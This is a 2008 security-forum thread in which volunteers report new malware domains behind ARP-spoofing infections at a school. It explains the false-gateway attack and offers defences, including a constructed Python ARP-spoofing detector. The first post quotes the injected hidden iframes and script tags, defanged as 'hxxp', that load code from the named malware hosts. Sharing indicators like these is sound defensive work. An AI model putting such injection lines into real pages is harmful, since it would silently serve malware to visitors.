CastleCops, Internet Crime Fighters

New ARP spoofing malware domains - 360nmb.cn and 99.vc

 
Post new topic   Reply to topic       All -> FavForums -> Web Malware Links [del.icio.us!] [digg it!] [reddit!]
View previous topic :: View next topic  
Author Message
reportingFromChina

Trooper
Joined: Sep 26, 2007
Posts: 20
Location: China

Posted: Mon Apr 21, 2008 11:12 am    Post subject: New ARP spoofing malware domains - 360nmb.cn and 99.vc

The latest ARP spoofing viruses have hit the
school I work at here. The domains, and the malicious junk they
insert into pages routed via infected "false" gateways are
respectively:

<iframe src=hxxp://x.360nmb.cn/ width=0 height=0 frameborder=0></iframe>

and
<script src=hxxp://al.99.vc/1.js></script>

Furthermore, the previously reported domain 791224.com is
being accessed by a slightly different URL than before:
<iframe src=hxxp://z.791224.com/ width=0 height=0 frameborder=0></iframe>
(I reported 791224.com in late February, just before your server crash,
so that posting was lost. However it was posted to the listserv).

I don't know whether the malware being served up from the new domains has any new tricks up its sleeve, but I suspect it may, as it's led to a rash of new infections just as we'd got the school 100% clean.

Here's a quick redux on how these viruses work, and strategies for dealing with them. This stuff is kind of scattered across my previous posts, so I think it's useful to put it in one list:

*An infected machine sends out fake ARP packets, which fool other machines on your network into connecting to the Internet via the infected machine.
*The infected machine acts as a proxy server, but inserts malicious code (e.g. above) into pages retrieved from certain, high value sites (e.g. Bank Of China, but not Google).
*As long as just one machine on your network is infected, your access to the internet will be affected (and you'll be vulnerable to infection).
*My experience has been that Firefox is far less vulnerable to
the malicious code inserted by the false gateway.
*You can protect yourself 100% from infection from known domains by editing your HOSTS file to make the known malware domains resolve to your loopback adapter. See this previous post for how:
CastleCops Link/modules.php?&name=Forums&file=viewtopic&t=212462
*Even if your machine is not itself infected, be aware that unencrypted traffic can be snooped by the "false" gateway.
*WinArpWatch is a useful tool for alerting you to ARP spoofing attacks on your network. You can get it via CastleCops' list of useful tools:
http://wiki.castlecops.com/Lists_of_freeware_analysis_tools#ARP_watch

RFC

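An added illustration of the kind of check a WinArpWatch-style monitor does for the "false gateway" pattern described in the post above (example code written for this page, not the poster's tool and not WinArpWatch itself; the gateway IP, MAC addresses and the sequence of ARP replies are constructed):

```python
"""Detect the false-gateway ARP spoofing pattern: an infected host answers
ARP for the gateway's IP with its own MAC, and typically claims other
clients' IPs with that same MAC as well. All sample data is constructed."""
from collections import defaultdict

# Constructed ARP replies seen on the LAN: (seq, sender_ip, sender_mac)
SAMPLE_ARP_REPLIES = [
    (1, "10.0.0.1", "00:11:22:33:44:01"),   # real gateway
    (2, "10.0.0.25", "00:11:22:33:44:25"),  # ordinary client
    (3, "10.0.0.1", "00:11:22:33:44:99"),   # infected host claims gateway IP
    (4, "10.0.0.25", "00:11:22:33:44:99"),  # same MAC also claims a client IP
    (5, "10.0.0.1", "00:11:22:33:44:01"),   # real gateway answers again
]


def detect_arp_spoofing(replies, gateway_ip, trusted_gateway_mac=None):
    """Return a list of alert strings for the given ARP replies.

    Alerts on (a) an IP answering with a MAC different from the one first
    seen for it (or from trusted_gateway_mac for the gateway, if given) and
    (b) one MAC claiming more than one IP, which is how a spoofing host
    inserts itself between every client and the gateway."""
    alerts = []
    ip_to_mac = {}                  # first (or trusted) MAC seen per IP
    mac_to_ips = defaultdict(set)   # every IP each MAC has claimed
    if trusted_gateway_mac:
        ip_to_mac[gateway_ip] = trusted_gateway_mac.lower()
    for seq, ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is None:
            ip_to_mac[ip] = mac     # baseline: first answer wins
        elif known != mac:
            tag = "GATEWAY" if ip == gateway_ip else "host"
            alerts.append(f"#{seq}: {tag} {ip} changed {known} -> {mac}")
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) == 2 and ip in mac_to_ips[mac]:
            # fires once, when a MAC first claims a second IP
            claimed = ", ".join(sorted(mac_to_ips[mac]))
            alerts.append(f"#{seq}: MAC {mac} claims multiple IPs: {claimed}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_ARP_REPLIES, "10.0.0.1"):
        print(line)
```

Pinning the real gateway's MAC via trusted_gateway_mac avoids the baseline being poisoned when the monitor starts on an already-spoofed segment.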
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5879
Posted: Tue Apr 22, 2008 11:08 am    Post subject:

I've added the 2 exploits, 14.htm + real.htm to the malware listserv.

The file arp.exe was detected by most AV companies.

I'll have a look at 1.js


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
ErikAlbert
Warnings : 3

Captain
Joined: Jan 20, 2005
Posts: 424


Posted: Thu May 01, 2008 3:01 pm    Post subject:

tetak wrote:
The file arp.exe was detected by most AV companies.

Perhaps I misunderstand, but the link pointed to by reportingFromChina does not have an arp.exe file.

tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5879
Posted: Thu May 01, 2008 4:52 pm    Post subject:

Maybe the RealPlayer exploit downloaded it from somewhere, I can't remember.
